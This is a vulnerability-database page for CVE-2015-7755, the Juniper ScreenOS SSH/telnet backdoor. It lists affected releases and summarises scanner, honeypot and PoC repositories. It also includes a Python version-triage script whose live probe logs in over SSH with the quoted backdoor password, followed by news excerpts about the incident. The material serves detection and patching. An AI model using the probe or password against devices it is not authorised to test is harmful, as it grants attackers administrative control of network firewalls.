
CVE-2015-7755

Published: 19/12/2015 Updated: 07/12/2016
CVSS v2 Base Score: 10 | Impact Score: 10 | Exploitability Score: 10
VMScore: 891
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Juniper ScreenOS 6.2.0r15 up to and including 6.2.0r18, 6.3.0r12 prior to 6.3.0r12b, 6.3.0r13 prior to 6.3.0r13b, 6.3.0r14 prior to 6.3.0r14b, 6.3.0r15 prior to 6.3.0r15b, 6.3.0r16 prior to 6.3.0r16b, 6.3.0r17 prior to 6.3.0r17b, 6.3.0r18 prior to 6.3.0r18b, 6.3.0r19 prior to 6.3.0r19b, and 6.3.0r20 prior to 6.3.0r21 allows remote malicious users to obtain administrative access by entering an unspecified password during a (1) SSH or (2) TELNET session.

Vulnerable Products

juniper screenos 6.3.0

Github Repositories

NetScreen Honeypot: an SSH honeypot based on Cowrie, modified to look like a NetScreen device vulnerable to CVE-2015-7755 (backdoor password).

A SHODAN/Censys + Paramiko scanner to check for backdoored Internet-facing Juniper ScreenOS devices.

netscreen-backdoor-scanner.py: a very simple SHODAN/Censys + Paramiko scanner to check for backdoored Internet-facing Juniper ScreenOS devices. For more information about this issue see Rapid7's blog post: community.rapid7.com/community/infosec/blog/2015/12/20/cve-2015-7755-juniper-screenos-authentication-backdoor. With code from breakpoint-labs.com/reconnais

CVE-2015-7755-POC: CVE-2015-7755 vulnerability detection that connects over SSH to the vulnerable versions ScreenOS 6.2.0r15 to 6.2.0r18 and 6.3.0r12 to 6.3.0r20 (Juniper Networks). User: root, password: <<< %s(un='%s') = %u

Notes, binaries, and related information from analysis of the CVE-2015-7755 & CVE-2015-7756 issues within Juniper ScreenOS

Juniper CVE-2015-7755 & CVE-2015-7756: this repository contains notes, binaries, and related information from analysis of the CVE-2015-7755 & CVE-2015-7756 issues within Juniper ScreenOS. For more information about these issues, please see the URLs below: forums.juniper.net/t5/Security-Incident-Response/Important-Announcement-about-ScreenOS/ba-p/285554 h
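The summary above gives the affected ScreenOS release ranges, and the scanner and PoC entries describe checking Internet-facing devices over SSH with the published backdoor password. The following is an added example, written for this page and not taken from any of the repositories listed: an offline triage of version strings against the stated ranges (useful against an inventory export before anyone touches a device), plus an optional live probe built on Paramiko's SSHClient. Assumptions not on the page: the tolerated trailing ".N" build component in version strings, the "<host> <version>" inventory line format, the constructed sample inventory, and the use of "root" as the username (the PoC entry uses it; the password is the one quoted in that entry).

```python
"""Triage ScreenOS version strings against the CVE-2015-7755 affected ranges,
with an optional live SSH probe (example code, not from the listed repositories)."""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Affected ranges as stated in the vulnerability summary on this page:
#   6.2.0: r15 through r18 (fixed in r19)
#   6.3.0: r12 through r19 when the build has no "b" suffix; r20 (fixed in r21)

# Accepts "6.3.0r17" and "6.3.0r17b". A trailing ".N" build component such as
# "6.3.0r17.0" is tolerated and ignored (assumption, not taken from the page).
VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)r(\d+)([a-z]?)(?:\.\d+)?$")


@dataclass(frozen=True)
class ScreenOSVersion:
    major: int
    minor: int
    patch: int
    release: int
    suffix: str  # "" or a letter such as "b"

    @property
    def train(self) -> Tuple[int, int, int]:
        return (self.major, self.minor, self.patch)


def parse_version(text: str) -> Optional[ScreenOSVersion]:
    """Parse a ScreenOS version string; returns None if it does not match."""
    m = VERSION_RE.match(text.strip())
    if not m:
        return None
    major, minor, patch, release, suffix = m.groups()
    return ScreenOSVersion(int(major), int(minor), int(patch), int(release), suffix)


def is_vulnerable(v: ScreenOSVersion) -> bool:
    """True if the version falls inside the ranges quoted in the summary."""
    if v.train == (6, 2, 0):
        return 15 <= v.release <= 18
    if v.train == (6, 3, 0):
        if 12 <= v.release <= 19:
            # "6.3.0r12 prior to 6.3.0r12b": the unsuffixed build (and any suffix
            # sorting before "b") is affected; the "b" respin carries the fix.
            return v.suffix < "b"
        return v.release == 20
    return False


def triage_inventory(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Each line is '<host> <version>' (assumed format). Returns (host, version, verdict)."""
    out = []
    for line in lines:
        if not line.strip() or line.startswith("#"):
            continue
        host, _, ver = line.partition(" ")
        parsed = parse_version(ver)
        if parsed is None:
            out.append((host, ver, "unparsed"))
        elif is_vulnerable(parsed):
            out.append((host, ver, "vulnerable"))
        else:
            out.append((host, ver, "not-affected"))
    return out


# Backdoor password reported for this issue (quoted in the PoC entry above).
BACKDOOR_PASSWORD = "<<< %s(un='%s') = %u"


def probe_backdoor(host: str, username: str = "root", port: int = 22,
                   timeout: float = 5.0) -> bool:
    """Live check: True if the device's SSH service accepts the backdoor password.
    Only run against devices you are authorised to test. Paramiko is imported
    lazily so the offline functions above work without it; network errors
    (timeouts, refused connections) propagate to the caller."""
    import paramiko
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(host, port=port, username=username, password=BACKDOOR_PASSWORD,
                       timeout=timeout, allow_agent=False, look_for_keys=False)
        return True
    except paramiko.AuthenticationException:
        return False
    finally:
        client.close()


# Constructed sample inventory for illustration; these are not real devices.
SAMPLE_INVENTORY = [
    "fw-edge-01 6.3.0r12",
    "fw-edge-02 6.3.0r12b",
    "fw-dc-01 6.2.0r18",
    "fw-dc-02 6.2.0r19",
    "fw-lab-01 6.3.0r20",
    "fw-lab-02 6.3.0r21",
    "fw-old-01 5.4.0r9",
    "fw-unknown banner-garbled",
]

if __name__ == "__main__":
    for host, ver, verdict in triage_inventory(SAMPLE_INVENTORY):
        print(f"{host:12} {ver:16} {verdict}")
```

The offline check is deliberately strict about the "b" suffix, since the summary's "rN prior to rNb" wording means an unsuffixed 6.3.0r17 is affected while 6.3.0r17b is not. A live probe that returns True is a confirmed backdoor; one that returns False only says the password was rejected, so a version that triages as vulnerable should still be patched or verified against the running image rather than cleared on the probe alone.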

Recent Articles

Threat intelligence report for the telecommunications industry
Securelist • Kaspersky Lab • 22 Aug 2016

Download PDF The telecommunications industry keeps the world connected. Telecoms providers build, operate and manage the complex network infrastructures used for voice and data transmission – and they communicate and store vast amounts of sensitive data. This makes them a top target for cyber-attack. According to PwC’s Global State of Information Security, 2016, IT security incidents in the telecoms sector increased 45% in 2015 compared to the year before. Telecoms providers need to arm them...

NASA, Dept of Defense, Commerce etc probed over use of backdoored Juniper kit
The Register • Chris Williams, Editor in Chief • 26 Jan 2016

Were firewalls up to date? Committee wants to know

A bunch of US government departments and agencies – from the military to NASA – are being grilled over their use of backdoored Juniper firewalls. The House of Representatives' Committee on Oversight and Government Reform fired off letters to top officials over the weekend, demanding to know if any of the dodgy NetScreen devices were used in federal systems. Juniper's ScreenOS software – the firmware that powers its firewalls – was tampered with by mystery hackers a few years ago to in...

Juniper 'fesses up to TWO attacks from 'unauthorised code'
The Register • Simon Sharwood • 20 Dec 2015

Networking biz silent on China dev centre as source of crooked code

Updated: Juniper Networks has offered a more detailed description of the security issues resulting from its find of “unauthorised code” in ScreenOS, the software that powers its firewalls. The company's knowledge base article on the incident says: “The first issue allows unauthorized remote administrative access to the device over SSH or telnet. Exploitation of this vulnerability can lead to complete compromise of the affected system.” While the company points out that "upon exploitation ...